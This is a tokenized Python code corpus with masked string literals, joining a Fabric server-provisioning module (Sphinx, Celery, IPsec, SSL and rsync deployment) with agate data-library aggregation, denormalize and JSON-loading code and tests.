'<STR_LIT>' : env . sphinx_counter , <EOL> } <EOL> with hide ( * fab_output_hides ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> context = context , <EOL> use_jinja = True , <EOL> template_dir = CONFIG_TPL_DIR , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> ) <EOL> script_destination = ( <EOL> '<STR_LIT>' % env . db_name <EOL> ) <EOL> with hide ( * fab_output_hides ) : <EOL> logger . info ( "<STR_LIT>" , script_destination ) <EOL> put ( <EOL> '<STR_LIT>' , <EOL> script_destination , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> use_sudo = True , <EOL> ) <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , script_destination ) ) <EOL> def _update_sphinx_settings ( self , sphinx_nodes , node_roles ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> assert len ( sphinx_nodes ) == <NUM_LIT:1> <EOL> node = sphinx_nodes [ <NUM_LIT:0> ] <EOL> env . pstat_settings [ '<STR_LIT>' ] = node . boto_instance . private_dns_name <EOL> env . pstat_settings [ '<STR_LIT>' ] = False <EOL> if '<STR_LIT>' in node_roles : <EOL> env . pstat_settings [ '<STR_LIT>' ] = True <EOL> def _update_celery_backend_settings ( self , celery_backend_nodes ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> assert len ( celery_backend_nodes ) == <NUM_LIT:1> <EOL> node = celery_backend_nodes [ <NUM_LIT:0> ] <EOL> env . pstat_settings [ '<STR_LIT>' ] = node . boto_instance . private_dns_name <EOL> def _update_ldap_api_endpoint_settings ( <EOL> self , all_ldap_api_nodes , same_az_ldap_api_nodes , node_roles , <EOL> ) : <EOL> env . pstat_settings [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' in node_roles : <EOL> logger . info ( "<STR_LIT>" ) <EOL> return <EOL> logger . info ( "<STR_LIT>" ) <EOL> same_az_first = BaseProvisioner . order_nodes_by_same_az ( <EOL> all_ldap_api_nodes , <EOL> same_az_ldap_api_nodes , <EOL> ) <EOL> for node in same_az_first : <EOL> api_endpoint = API_ENDPOINT % { <EOL> '<STR_LIT>' : node . boto_instance . private_dns_name , <EOL> } <EOL> env . pstat_settings [ '<STR_LIT>' ] . append ( <EOL> api_endpoint , <EOL> ) <EOL> def _update_celery_ldap_settings ( self , node_roles ) : <EOL> """<STR_LIT>""" <EOL> env . pstat_settings [ '<STR_LIT>' ] = False <EOL> env . enable_celery_ldap = False <EOL> if '<STR_LIT>' in node_roles : <EOL> logger . info ( "<STR_LIT>" ) <EOL> env . pstat_settings [ '<STR_LIT>' ] = True <EOL> env . enable_celery_ldap = True <EOL> return <EOL> logger . info ( "<STR_LIT>" ) <EOL> def _update_cache_settings ( self , memcached_nodes ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> assert len ( memcached_nodes ) > <NUM_LIT:0> <EOL> if memcached_nodes : <EOL> memcached_port = <NUM_LIT> <EOL> cache_str = '<STR_LIT>' <EOL> cache_instances = [ ] <EOL> for node in memcached_nodes : <EOL> cache_instances . append ( <EOL> "<STR_LIT>" % ( <EOL> node . boto_instance . private_dns_name , <EOL> memcached_port , <EOL> ) <EOL> ) <EOL> cache_str += '<STR_LIT:;>' . join ( cache_instances ) <EOL> env . pstat_settings [ '<STR_LIT>' ] = cache_str <EOL> def _link_storage_dirs ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> dirs = [ <EOL> ( name , '<STR_LIT>' % env + name ) <EOL> for name in LINKED_DIRS <EOL> ] <EOL> for name , link_name in dirs : <EOL> with hide ( * fab_output_hides ) : <EOL> storage_dir = os . path . join ( MEDIA_STORAGE_ROOT , name ) <EOL> sudo ( '<STR_LIT>' % storage_dir ) <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , storage_dir ) ) <EOL> sudo ( '<STR_LIT>' % storage_dir ) <EOL> sudo ( '<STR_LIT>' % ( storage_dir , link_name ) ) <EOL> def _build_search_index ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> check_files = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> needs_init = False <EOL> for check_f in check_files : <EOL> with hide ( * fab_quiet ) : <EOL> check_result = sudo ( '<STR_LIT>' % check_f ) <EOL> if check_result . failed : <EOL> needs_init = True <EOL> break <EOL> if not needs_init : <EOL> logger . info ( "<STR_LIT>" ) <EOL> return False <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % F_CHOWN <EOL> ) <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> index_result = sudo_bg ( <EOL> '<STR_LIT>' , <EOL> user = '<STR_LIT>' , <EOL> ) <EOL> if index_result . failed : <EOL> logger . critical ( <EOL> "<STR_LIT>" , <EOL> index_result , <EOL> ) <EOL> return True <EOL> def _wait_for_search_indexing ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> indexer_exists = True <EOL> while indexer_exists : <EOL> with hide ( * fab_quiet ) : <EOL> indexer_found = run ( '<STR_LIT>' ) <EOL> indexer_exists = indexer_found . succeeded <EOL> if indexer_exists : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> WAIT_TIME , <EOL> indexer_found , <EOL> ) <EOL> time . sleep ( WAIT_TIME ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def _ensure_sphinx_running ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> def _is_running ( ) : <EOL> check_cmd = "<STR_LIT>" <EOL> with hide ( * fab_quiet ) : <EOL> check_result = sudo ( check_cmd ) <EOL> return check_result . return_code == <NUM_LIT:0> <EOL> def _start_sphinx ( stop_first = False ) : <EOL> start_cmd = "<STR_LIT>" <EOL> with hide ( * fab_output_hides ) : <EOL> if stop_first : <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( start_cmd ) <EOL> wait_str = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> _start_sphinx ( stop_first = True ) <EOL> self . wait_for_condition ( <EOL> _is_running , <EOL> wait_str , <EOL> retry_action = _start_sphinx , <EOL> wait_seconds = WAIT_TIME , <EOL> prompt_cycles = <NUM_LIT:2> , <EOL> ) <EOL> def _configure_sphinx_cron ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> script_path = '<STR_LIT>' <EOL> cron_location = '<STR_LIT>' <EOL> context = { <EOL> '<STR_LIT>' : script_path , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> with hide ( * fab_output_hides ) : <EOL> upload_template ( <EOL> "<STR_LIT>" , <EOL> cron_location , <EOL> context , <EOL> use_sudo = True ) <EOL> sudo ( '<STR_LIT>' % cron_location ) <EOL> def _needs_syslog_ng_restart ( self ) : <EOL> with hide ( * fab_quiet ) : <EOL> with hide ( '<STR_LIT>' ) : <EOL> result = sudo ( '<STR_LIT>' ) <EOL> if result . failed : <EOL> logger . info ( "<STR_LIT>" ) <EOL> return True <EOL> with hide ( '<STR_LIT>' ) : <EOL> changed_conf = sudo ( <EOL> ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> shell = True , <EOL> ) <EOL> if changed_conf . return_code != <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" ) <EOL> return True <EOL> return False <EOL> def _configure_loggly ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> install_check = run ( '<STR_LIT>' , shell = True ) <EOL> if install_check . return_code != <NUM_LIT:0> : <EOL> sudo ( '<STR_LIT>' ) <EOL> context = env . loggly_inputs <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> context , <EOL> use_sudo = True ) <EOL> if self . _needs_syslog_ng_restart ( ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> result = sudo ( '<STR_LIT>' ) <EOL> if result . failed : <EOL> logger . critical ( "<STR_LIT>" ) <EOL> logger . critical ( result ) <EOL> exit ( <NUM_LIT:1> ) <EOL> def _configure_calabar ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> tunnel_confs_dir = '<STR_LIT>' <EOL> configuration_changed = False <EOL> with hide ( * fab_output_hides ) : <EOL> changed = put_changed ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> ) <EOL> if changed : <EOL> configuration_changed = True <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> with hide ( * fab_output_hides ) : <EOL> for dirpath , _ , filenames in os . walk ( tunnel_confs_dir ) : <EOL> for filename in filenames : <EOL> calabar_config_file = os . path . join ( dirpath , filename ) <EOL> changed = upload_template_changed ( <EOL> calabar_config_file , <EOL> '<STR_LIT>' , <EOL> context = env . calabar_conf_context , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> ) <EOL> if changed : <EOL> configuration_changed = True <EOL> if configuration_changed : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> def _stop_celery ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo_bg ( '<STR_LIT>' ) <EOL> def _start_celery ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo_bg ( '<STR_LIT>' ) <EOL> def _ensure_uwsgi_up ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_quiet ) : <EOL> sudo_bg ( '<STR_LIT>' ) <EOL> def _configure_celery ( self , node_roles ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> hostname = env . hostname <EOL> enable_periodic_tasks = env . enable_periodic_tasks <EOL> enable_celery_ldap = env . enable_celery_ldap <EOL> celery_conf = self . conf . get ( '<STR_LIT>' , { } ) <EOL> newrelic_conf = self . conf . get ( '<STR_LIT>' , { } ) <EOL> new_relic_environment = newrelic_conf . get ( '<STR_LIT>' , None ) <EOL> context = { <EOL> '<STR_LIT>' : new_relic_environment , <EOL> '<STR_LIT>' : hostname , <EOL> '<STR_LIT>' : enable_periodic_tasks , <EOL> '<STR_LIT>' : enable_celery_ldap , <EOL> '<STR_LIT>' : celery_conf , <EOL> } <EOL> with hide ( * fab_output_hides ) : <EOL> changed = upload_template_changed ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> use_jinja = True , <EOL> context = context , <EOL> ) <EOL> if changed : <EOL> self . modified_services . append ( SUPERVISORD ) <EOL> def _update_supervisord ( self ) : <EOL> if SUPERVISORD not in self . modified_services : <EOL> logger . info ( "<STR_LIT>" ) <EOL> return <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_quiet ) : <EOL> sudo_bg ( '<STR_LIT>' ) <EOL> def _configure_ipsec ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> ipsec_confs = env . get ( '<STR_LIT>' ) <EOL> needs_restart = False <EOL> changed = self . _configure_ipsec_networking ( ) <EOL> needs_restart = needs_restart or changed <EOL> changed = self . _configure_ipsec_base ( ipsec_confs ) <EOL> needs_restart = needs_restart or changed <EOL> changed = self . _configure_ipsec_secrets ( ipsec_confs ) <EOL> needs_restart = needs_restart or changed <EOL> for ipsec_name , ipsec_conf in ipsec_confs . items ( ) : <EOL> changed = self . _configure_ipsec_site ( ipsec_name , ipsec_conf ) <EOL> needs_restart = needs_restart or changed <EOL> if needs_restart : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> return <EOL> logger . info ( "<STR_LIT>" ) <EOL> def _configure_ipsec_networking ( self ) : <EOL> """<STR_LIT>""" <EOL> with hide ( * fab_output_hides ) : <EOL> changed = upload_template_changed ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> ) <EOL> if changed : <EOL> sudo ( '<STR_LIT>' ) <EOL> return changed <EOL> def _configure_ipsec_base ( self , ipsec_confs ) : <EOL> """<STR_LIT>""" <EOL> base_conf_tpl = '<STR_LIT>' <EOL> subnet_exclusions = [ ] <EOL> for conf in ipsec_confs . values ( ) : <EOL> subnet_exclusion = '<STR_LIT>' % conf [ '<STR_LIT>' ] <EOL> subnet_exclusions . append ( subnet_exclusion ) <EOL> excluded_subnets = '<STR_LIT:U+002C>' . join ( subnet_exclusions ) <EOL> with hide ( * fab_output_hides ) : <EOL> return upload_template_changed ( <EOL> base_conf_tpl , <EOL> '<STR_LIT>' , <EOL> context = { '<STR_LIT>' : excluded_subnets } , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> ) <EOL> def _configure_ipsec_secrets ( self , ipsec_confs ) : <EOL> """<STR_LIT>""" <EOL> secrets_tpl = '<STR_LIT>' <EOL> secret_confs = [ ] <EOL> for name , conf in ipsec_confs . items ( ) : <EOL> secret_conf = { <EOL> '<STR_LIT>' : conf [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : env . get ( '<STR_LIT>' % name ) , <EOL> } <EOL> secret_confs . append ( secret_conf ) <EOL> with hide ( * fab_output_hides ) : <EOL> return upload_template_changed ( <EOL> secrets_tpl , <EOL> '<STR_LIT>' , <EOL> context = { '<STR_LIT>' : secret_confs } , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> use_jinja = True <EOL> ) <EOL> def _configure_ipsec_site ( self , name , confs ) : <EOL> """<STR_LIT>""" <EOL> site_conf_tpl = '<STR_LIT>' <EOL> context = { <EOL> '<STR_LIT>' : name , <EOL> '<STR_LIT>' : env . aws_elastic_ip , <EOL> } <EOL> for key , value in confs . items ( ) : <EOL> context [ key ] = value <EOL> with hide ( * fab_output_hides ) : <EOL> return upload_template_changed ( <EOL> site_conf_tpl , <EOL> '<STR_LIT>' % name , <EOL> context = context , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> ) <EOL> def _fix_pstat_logging_perms ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' % F_CHOWN ) <EOL> def _enable_cron_tpl ( self , cron_file ) : <EOL> context = { <EOL> '<STR_LIT>' : os . path . join ( env . project_root , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : PYTHON_BIN , <EOL> '<STR_LIT>' : LOG_DIR , <EOL> } <EOL> cron_dst_base = '<STR_LIT>' <EOL> cron_tpl_path = os . path . join ( '<STR_LIT>' , cron_file ) <EOL> cron_dst_path = os . path . join ( cron_dst_base , cron_file ) <EOL> upload_template ( cron_tpl_path , cron_dst_path , context , use_sudo = True ) <EOL> sudo ( '<STR_LIT>' % cron_dst_path ) <EOL> def _configure_pstat_cron_jobs ( self ) : <EOL> if not env . get ( '<STR_LIT>' , False ) : <EOL> return <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> self . _enable_cron_tpl ( '<STR_LIT>' ) <EOL> def _configure_email_sending ( self ) : <EOL> if not env . get ( '<STR_LIT>' , False ) : <EOL> return <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> self . _enable_cron_tpl ( '<STR_LIT>' ) <EOL> COPY_DIRS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> EXCLUDES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def push_source ( <EOL> new_source_dir , current_source_dir = None , chown = None , chmod = None , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( u"<STR_LIT>" , env . host_string ) <EOL> sudo ( "<STR_LIT>" % new_source_dir ) <EOL> if current_source_dir : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> current_source_dir , <EOL> ) <EOL> for copy_dir in COPY_DIRS : <EOL> from_dir = os . path . join ( current_source_dir , copy_dir ) <EOL> to_dir = os . path . join ( new_source_dir , copy_dir ) <EOL> sudo ( "<STR_LIT>" % ( from_dir , to_dir ) ) <EOL> sudo ( '<STR_LIT>' % current_source_dir ) <EOL> sudo ( '<STR_LIT>' % current_source_dir ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" % ( env . user , new_source_dir ) ) <EOL> logger . info ( u"<STR_LIT>" ) <EOL> start = time . time ( ) <EOL> def do_rsync ( ) : <EOL> extra_opts = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '''<STR_LIT>''' , <EOL> ] <EOL> return rsync_project ( <EOL> '<STR_LIT:%s>' % new_source_dir , <EOL> local_dir = '<STR_LIT>' , <EOL> exclude = EXCLUDES , <EOL> delete = True , <EOL> extra_opts = '<STR_LIT:U+0020>' . join ( extra_opts ) , <EOL> ) <EOL> output = do_rsync ( ) <EOL> if output . failed : <EOL> logger . warning ( <EOL> "<STR_LIT>" % output . return_code <EOL> ) <EOL> start = time . time ( ) <EOL> output = do_rsync ( ) <EOL> if output . failed : <EOL> logger . critical ( "<STR_LIT>" ) <EOL> exit ( <NUM_LIT:1> ) <EOL> logger . info ( "<STR_LIT>" , time . time ( ) - start ) <EOL> logger . info ( "<STR_LIT>" , output ) <EOL> if chown : <EOL> sudo ( "<STR_LIT>" % ( chown , new_source_dir ) ) <EOL> if chmod is not None : <EOL> if type ( chmod ) == int : <EOL> chmod = "<STR_LIT>" % chmod <EOL> sudo ( "<STR_LIT>" % ( chmod , new_source_dir ) ) <EOL> def push_ssl_crt ( ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( u"<STR_LIT>" ) <EOL> key = '<STR_LIT>' % env <EOL> crt = '<STR_LIT>' % env <EOL> bundle = '<STR_LIT>' % env <EOL> logger . info ( u"<STR_LIT>" % ( key , crt ) ) <EOL> put ( key , '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> put ( crt , '<STR_LIT>' ) <EOL> put ( bundle , '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> sudo ( '<STR_LIT>' ) <EOL> def sudo_bg ( cmd , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> cmd_tpl = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> return sudo ( cmd_tpl % cmd , pty = False , ** kwargs ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> __license__ = __doc__ <EOL> __project_url__ = '<STR_LIT>' </s>
<s> from machine import UART <EOL> import machine <EOL> import os <EOL> uart = UART ( <NUM_LIT:0> , baudrate = <NUM_LIT> ) <EOL> os . dupterm ( uart ) <EOL> machine . main ( '<STR_LIT>' ) </s>
<s> from agate . aggregations . base import Aggregation <EOL> from agate . aggregations . has_nulls import HasNulls <EOL> from agate . aggregations . mean import Mean <EOL> from agate . data_types import Number <EOL> from agate . exceptions import DataTypeError <EOL> from agate . warns import warn_null_calculation <EOL> class Variance ( Aggregation ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , column_name ) : <EOL> self . _column_name = column_name <EOL> self . _mean = Mean ( column_name ) <EOL> def get_aggregate_data_type ( self , table ) : <EOL> return Number ( ) <EOL> def validate ( self , table ) : <EOL> column = table . columns [ self . _column_name ] <EOL> if not isinstance ( column . data_type , Number ) : <EOL> raise DataTypeError ( '<STR_LIT>' ) <EOL> has_nulls = HasNulls ( self . _column_name ) . run ( table ) <EOL> if has_nulls : <EOL> warn_null_calculation ( self , column ) <EOL> def run ( self , table ) : <EOL> column = table . columns [ self . _column_name ] <EOL> data = column . values_without_nulls ( ) <EOL> mean = self . _mean . run ( table ) <EOL> return sum ( ( n - mean ) ** <NUM_LIT:2> for n in data ) / ( len ( data ) - <NUM_LIT:1> ) <EOL> class PopulationVariance ( Variance ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , column_name ) : <EOL> self . _column_name = column_name <EOL> self . _mean = Mean ( column_name ) <EOL> def get_aggregate_data_type ( self , table ) : <EOL> return Number ( ) <EOL> def validate ( self , table ) : <EOL> column = table . columns [ self . _column_name ] <EOL> if not isinstance ( column . data_type , Number ) : <EOL> raise DataTypeError ( '<STR_LIT>' ) <EOL> has_nulls = HasNulls ( self . _column_name ) . run ( table ) <EOL> if has_nulls : <EOL> warn_null_calculation ( self , column ) <EOL> def run ( self , table ) : <EOL> column = table . columns [ self . _column_name ] <EOL> data = column . values_without_nulls ( ) <EOL> mean = self . _mean . run ( table ) <EOL> return sum ( ( n - mean ) ** <NUM_LIT:2> for n in data ) / len ( data ) </s>
<s> from collections import OrderedDict <EOL> try : <EOL> from cdecimal import Decimal <EOL> except ImportError : <EOL> from decimal import Decimal <EOL> import six <EOL> from agate . data_types import Number <EOL> from agate . type_tester import TypeTester <EOL> from agate . rows import Row <EOL> from agate import utils <EOL> @ utils . allow_tableset_proxy <EOL> def denormalize ( self , key = None , property_column = '<STR_LIT>' , value_column = '<STR_LIT:value>' , default_value = utils . default , column_types = None ) : <EOL> """<STR_LIT>""" <EOL> from agate . table import Table <EOL> if key is None : <EOL> key = [ ] <EOL> elif not utils . issequence ( key ) : <EOL> key = [ key ] <EOL> field_names = [ ] <EOL> row_data = OrderedDict ( ) <EOL> for row in self . rows : <EOL> row_key = tuple ( row [ k ] for k in key ) <EOL> if row_key not in row_data : <EOL> row_data [ row_key ] = OrderedDict ( ) <EOL> f = six . text_type ( row [ property_column ] ) <EOL> v = row [ value_column ] <EOL> if f not in field_names : <EOL> field_names . append ( f ) <EOL> row_data [ row_key ] [ f ] = v <EOL> if default_value == utils . default : <EOL> if isinstance ( self . columns [ value_column ] . data_type , Number ) : <EOL> default_value = Decimal ( <NUM_LIT:0> ) <EOL> else : <EOL> default_value = None <EOL> new_column_names = key + field_names <EOL> new_rows = [ ] <EOL> row_names = [ ] <EOL> for k , v in row_data . items ( ) : <EOL> row = list ( k ) <EOL> if len ( k ) == <NUM_LIT:1> : <EOL> row_names . append ( k [ <NUM_LIT:0> ] ) <EOL> else : <EOL> row_names . append ( k ) <EOL> for f in field_names : <EOL> if f in v : <EOL> row . append ( v [ f ] ) <EOL> else : <EOL> row . append ( default_value ) <EOL> new_rows . append ( Row ( row , new_column_names ) ) <EOL> key_column_types = [ self . column_types [ self . column_names . index ( name ) ] for name in key ] <EOL> if column_types is None or isinstance ( column_types , TypeTester ) : <EOL> tester = TypeTester ( ) if column_types is None else column_types <EOL> force_update = dict ( zip ( key , key_column_types ) ) <EOL> force_update . update ( tester . _force ) <EOL> tester . _force = force_update <EOL> new_column_types = tester . run ( new_rows , new_column_names ) <EOL> else : <EOL> new_column_types = key_column_types + list ( column_types ) <EOL> return Table ( new_rows , new_column_names , new_column_types , row_names = row_names ) </s>
<s> from collections import OrderedDict <EOL> from decimal import Decimal <EOL> from glob import glob <EOL> import json <EOL> import os <EOL> import six <EOL> from agate . table import Table <EOL> @ classmethod <EOL> def from_json ( cls , path , column_names = None , column_types = None , keys = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> from agate . tableset import TableSet <EOL> if isinstance ( path , six . string_types ) and not os . path . isdir ( path ) and not os . path . isfile ( path ) : <EOL> raise IOError ( '<STR_LIT>' ) <EOL> tables = OrderedDict ( ) <EOL> if isinstance ( path , six . string_types ) and os . path . isdir ( path ) : <EOL> filepaths = glob ( os . path . join ( path , '<STR_LIT>' ) ) <EOL> if keys is not None and len ( keys ) != len ( filepaths ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> for i , filepath in enumerate ( filepaths ) : <EOL> name = os . path . split ( filepath ) [ <NUM_LIT:1> ] . strip ( '<STR_LIT>' ) <EOL> if keys is not None : <EOL> tables [ name ] = Table . from_json ( filepath , keys [ i ] , column_types = column_types , ** kwargs ) <EOL> else : <EOL> tables [ name ] = Table . from_json ( filepath , column_types = column_types , ** kwargs ) <EOL> else : <EOL> if hasattr ( path , '<STR_LIT>' ) : <EOL> js = json . load ( path , object_pairs_hook = OrderedDict , parse_float = Decimal , ** kwargs ) <EOL> else : <EOL> with open ( path , '<STR_LIT:r>' ) as f : <EOL> js = json . load ( f , object_pairs_hook = OrderedDict , parse_float = Decimal , ** kwargs ) <EOL> for key , value in js . items ( ) : <EOL> tables [ key ] = Table . from_object ( value , column_types = column_types , ** kwargs ) <EOL> return TableSet ( tables . values ( ) , tables . keys ( ) ) </s>
<s> from agate import Table <EOL> from agate . data_types import * <EOL> from agate . type_tester import TypeTester <EOL> from agate . testcase import AgateTestCase <EOL> class TestDenormalize ( AgateTestCase ) : <EOL> def setUp ( self ) : <EOL> self . rows = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> self . text_type = Text ( ) <EOL> self . column_names = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:value>' ] <EOL> self . column_types = [ self . text_type , self . text_type , self . text_type , self . text_type ] <EOL> def test_denormalize ( self ) : <EOL> table = Table ( self . rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:value>' ) <EOL> normal_rows = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Text , Number ] ) <EOL> self . assertRowNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_denormalize_no_key ( self ) : <EOL> table = Table ( self . rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( None , '<STR_LIT>' , '<STR_LIT:value>' ) <EOL> normal_rows = ( <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Number ] ) <EOL> def test_denormalize_multiple_keys ( self ) : <EOL> table = Table ( self . rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT:value>' ) <EOL> normal_rows = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ) <EOL> self . assertRows ( normalized_table , normal_rows ) <EOL> self . assertColumnNames ( normalized_table , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertColumnTypes ( normalized_table , [ Text , Text , Text , Number ] ) <EOL> self . assertRowNames ( normalized_table , [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> def test_denormalize_default_value ( self ) : <EOL> table = Table ( self . rows , self . column_names , self . column_types ) <EOL> normalized_table = table . denormalize ( [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT:value>' , default_value = '<STR_LIT:hello>' ) <EOL> 